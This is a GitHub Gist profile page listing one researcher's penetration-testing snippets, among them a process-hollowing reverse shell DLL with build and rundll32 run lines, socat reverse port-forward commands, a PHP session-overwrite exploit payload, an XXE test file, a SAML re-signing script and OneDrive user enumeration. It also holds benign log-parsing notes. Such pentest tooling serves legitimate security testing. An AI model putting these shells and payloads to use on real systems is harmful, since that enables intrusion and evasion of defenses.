Skip to content

Instantly share code, notes, and snippets.

Avatar

Frank Spierings FrankSpierings

View GitHub Profile
@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active Nov 26, 2020
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@FrankSpierings
FrankSpierings / request-minify.py
Last active Nov 6, 2020
Burp extension to minify a requests headers and parameters to another repeater tab.
View request-minify.py
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
@FrankSpierings
FrankSpierings / burp-ntfs-ads-scan.py
Last active Nov 10, 2020
Burp NTFS Alternative Data Stream Scanner
View burp-ntfs-ads-scan.py
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
@FrankSpierings
FrankSpierings / cookie-authenticated-onedrive-enum.py
Created Oct 6, 2020
Checks OneDrive access based on someone's UPN.
View cookie-authenticated-onedrive-enum.py
@FrankSpierings
FrankSpierings / README.MD
Last active Aug 12, 2020
Windows Reverse Port Forwarding using C# / Powershell
View README.MD

Socat

  • On the lhost listening side you can use socat to create two server sockets.
socat -dd TCP-LISTEN:4444,reuseaddr,fork TCP-LISTEN:1234,reuseaddr
  • Once WPF connected to port 4444, you can talk to 127.0.0.1:1234 as if it where the remote host.
@FrankSpierings
FrankSpierings / sample-php-socket-connect.php
Created Aug 11, 2020
PHP Socket Connect Example Reference
View sample-php-socket-connect.php
<?php
$host = "ifconfig.co";
$port = 80;
$msg = "GET / HTTP/1.1\r\nHost: $host\r\n\r\n";
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($sock, $host, $port);
socket_send($sock, $msg, strlen($msg), 0);
$result = socket_read($sock, 4096);
echo $result;
@FrankSpierings
FrankSpierings / README.MD
Created Aug 6, 2020
Session overwrite in PHP through extract - PoC
View README.MD

Exploit

  • POST-ing a body containing _SESSION[secret]=1 will log you in, but only through the second extract.
View xxe-test.xml
<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY sample "KqsdwTrqAisGYNNu5XMhkUV4gTxm8ed8">
]>
<root>&sample;</root>
@FrankSpierings
FrankSpierings / saml-raider-manual-resing.py
Created Jun 29, 2020
If SAML Raider won't re-sign the requests....
View saml-raider-manual-resing.py
from lxml import etree
from signxml import XMLSigner, XMLVerifier
self_key_path = 'self.key'
cloned_cert_path ='self.pem'
# Remove signatures using SAML Raider
unsigned_saml_path = 'unsigned_1.xml'
self_key = open(self_key_path).read()
@FrankSpierings
FrankSpierings / ELK-Evtx-and-MSDNS.md
Last active Jul 1, 2020
Describes some configuration and scripts to parse Evtx files and MS-DNS Debug query logs to the ELK stack.
View ELK-Evtx-and-MSDNS.md

Setup Docker Elk Stack

  • Pull the recipe:
cd /tmp
git clone https://github.com/deviantony/docker-elk
  • Add the following to elasticsearch/config/elasticsearch.yml:
You can’t perform that action at this time.